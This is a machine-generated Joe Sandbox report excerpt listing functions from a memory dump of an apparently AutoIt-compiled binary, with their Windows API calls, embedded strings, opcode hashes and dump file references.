                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$OpenOption
                                                                                                          • String ID: <local>
                                                                                                          • API String ID: 942729171-4266983199
                                                                                                          • Opcode ID: 36def104d3605a81b859902591414ddeacf77b8522eebb0f32c06c6270b75435
                                                                                                          • Instruction ID: 97b53ce5b938d1b8b3b5910cc1fadf9ccb81b7b0767006ea00760992982108d7
                                                                                                          • Opcode Fuzzy Hash: 36def104d3605a81b859902591414ddeacf77b8522eebb0f32c06c6270b75435
                                                                                                          • Instruction Fuzzy Hash: 03119E70501226BAEB298B51CC89EFBFBA8EF05755F10952EF6496A100E3706894DAE0
                                                                                                          Function 00EAD116 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscmp
                                                                                                          • String ID: 0.0.0.0$L,
                                                                                                          • API String ID: 856254489-1974781669
                                                                                                          • Opcode ID: 6becb95e40c85e09832695c522bc0a0a866d351aa61560cc5fb4700d19d260fd
                                                                                                          • Instruction ID: 681bff6dbf8b3663532718074974cedc6b102017b0eee65afb4b2f2d8be51413
                                                                                                          • Opcode Fuzzy Hash: 6becb95e40c85e09832695c522bc0a0a866d351aa61560cc5fb4700d19d260fd
                                                                                                          • Instruction Fuzzy Hash: 6E11BF757042049FCB04EE24D881EAAB3F9AF99714F109049EA0A7F3A1CA30FD46CB60
                                                                                                          Function 00EB8475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EB86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00EB849D,?,00000000,?,?), ref: 00EB86F7
                                                                                                          • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00EB84A0
                                                                                                          • htons.WSOCK32(00000000,?,00000000), ref: 00EB84DD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                          • String ID: 255.255.255.255
                                                                                                          • API String ID: 2496851823-2422070025
                                                                                                          • Opcode ID: 52ecca2b41143974fa0b8b6cca4aeb52494e4f78747b05c8eea300be3e6c2791
                                                                                                          • Instruction ID: 663e9f9385b34fff3ec99b8044a2f5249cfba7dc3f2c2cb4baefbe1a1232e4c3
                                                                                                          • Opcode Fuzzy Hash: 52ecca2b41143974fa0b8b6cca4aeb52494e4f78747b05c8eea300be3e6c2791
                                                                                                          • Instruction Fuzzy Hash: 6811C23020020AABCB10AF64D942FEFB368EF00314F10561AEA25773C1DB71A804CA95
                                                                                                          Function 00E999BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00E9B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E9B7BD
                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E99A2B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend_memmove
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 372448540-1403004172
                                                                                                          • Opcode ID: 356fc292afde6666e86906fb576894a66c013b4d3b2ffcc468ba2901fd189fea
                                                                                                          • Instruction ID: 356fa5caec31ca158fe7e6f75e14c1ebbc9765efcd16201a9a0ba18c6ca5fbd4
                                                                                                          • Opcode Fuzzy Hash: 356fc292afde6666e86906fb576894a66c013b4d3b2ffcc468ba2901fd189fea
                                                                                                          • Instruction Fuzzy Hash: 8501F5B1A42218AB8F14EBA8CC52DFEB3A9EF52320B141B19FC75772C2DA31580CC650
                                                                                                          Function 00EA934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock_memmove
                                                                                                          • String ID: EA06
                                                                                                          • API String ID: 1988441806-3962188686
                                                                                                          • Opcode ID: 022ee958e49897340cb54c0324da6aa00f08bb9b5c8b8189f497e5453884f740
                                                                                                          • Instruction ID: eb30845b35ae79687ce1c5884cc9e73bb4a17dd27ecab6f67c050f5ec41c4589
                                                                                                          • Opcode Fuzzy Hash: 022ee958e49897340cb54c0324da6aa00f08bb9b5c8b8189f497e5453884f740
                                                                                                          • Instruction Fuzzy Hash: C901F9729442587EDF18C6A8CC56EFE7BF89B05301F00419AF552E6581E579A6088760
                                                                                                          Function 00E998B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00E9B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E9B7BD
                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E99923
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend_memmove
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 372448540-1403004172
                                                                                                          • Opcode ID: 9bb2fc1295062652c9055bbf438fffe008f62dd6e9830cca1ad3c4dc0bc395a0
                                                                                                          • Instruction ID: 9671ed5cbaf07a61901a1a9dd23b11328c90f0148df684ba614e490a82440465
                                                                                                          • Opcode Fuzzy Hash: 9bb2fc1295062652c9055bbf438fffe008f62dd6e9830cca1ad3c4dc0bc395a0
                                                                                                          • Instruction Fuzzy Hash: B801D4B6A421086BCF14EBA4C952EFEB3E89F51340F14211DBC4577282DA105E0CD6B1
                                                                                                          Function 00E9993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00E9B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E9B7BD
                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E999A6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend_memmove
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 372448540-1403004172
                                                                                                          • Opcode ID: 73d0b2be9bb86750d0d50f0724b20aa2d7eb9ab0cfd0f5ba6fabf20e6a617b97
                                                                                                          • Instruction ID: 48a793fc3c48af63f959b9e06d61ea63dea1b4106622ccdde43ec48b5b1e8867
                                                                                                          • Opcode Fuzzy Hash: 73d0b2be9bb86750d0d50f0724b20aa2d7eb9ab0cfd0f5ba6fabf20e6a617b97
                                                                                                          • Instruction Fuzzy Hash: B201DBB2A421086BCF14EBA4CA12FFFB3EC9F51340F54215ABC45B7282DA154E0CD671
                                                                                                          Function 00EA54E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName_wcscmp
                                                                                                          • String ID: #32770
                                                                                                          • API String ID: 2292705959-463685578
                                                                                                          • Opcode ID: 6af249a6e4bfc8966c22102e0322d68243b3328675de717b9c811ab811fb801f
                                                                                                          • Instruction ID: 28893d899eb8541757d712a41a3222cc8b19acfda260a05068d939951f85f96f
                                                                                                          • Opcode Fuzzy Hash: 6af249a6e4bfc8966c22102e0322d68243b3328675de717b9c811ab811fb801f
                                                                                                          • Instruction Fuzzy Hash: C2E09B7290022D1BD710A699AC45BABFBACEB55771F001057F904E6051D560A94587D0
                                                                                                          Function 00E98892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E988A0
                                                                                                            • Part of subcall function 00E63588: _doexit.LIBCMT ref: 00E63592
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message_doexit
                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                          • API String ID: 1993061046-4017498283
                                                                                                          • Opcode ID: 5b57e8fa333c2f654ced0e106ee3f625fe562ba39d51947f36497b2ddc446287
                                                                                                          • Instruction ID: c1a027044262f4f9dd569cc2dbfd9300a691dd2453b953db6facaceb0140579a
                                                                                                          • Opcode Fuzzy Hash: 5b57e8fa333c2f654ced0e106ee3f625fe562ba39d51947f36497b2ddc446287
                                                                                                          • Instruction Fuzzy Hash: E9D0C27128131832C22432A47D0ABDA6A88CB05B91F04142ABB08755C349E1898042A5
                                                                                                          Function 00E80251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00E80091
                                                                                                            • Part of subcall function 00EBC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00E8027A,?), ref: 00EBC6E7
                                                                                                            • Part of subcall function 00EBC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EBC6F9
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00E80289
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                          • String ID: WIN_XPe
                                                                                                          • API String ID: 582185067-3257408948
                                                                                                          • Opcode ID: 85a2f7a7f95d33d9a34392777f6b5ea14e608332b5128a5d4524bef80b6a4249
                                                                                                          • Instruction ID: 10f1bbd0a1812aae09cb7e4bf4c1ee0671ab99c528ff015a30adc391b5abe334
                                                                                                          • Opcode Fuzzy Hash: 85a2f7a7f95d33d9a34392777f6b5ea14e608332b5128a5d4524bef80b6a4249
                                                                                                          • Instruction Fuzzy Hash: C5F03971806109DFCB55EBA1D988BECBBF8EB08304F242485E14AB21A1CB714F89DF20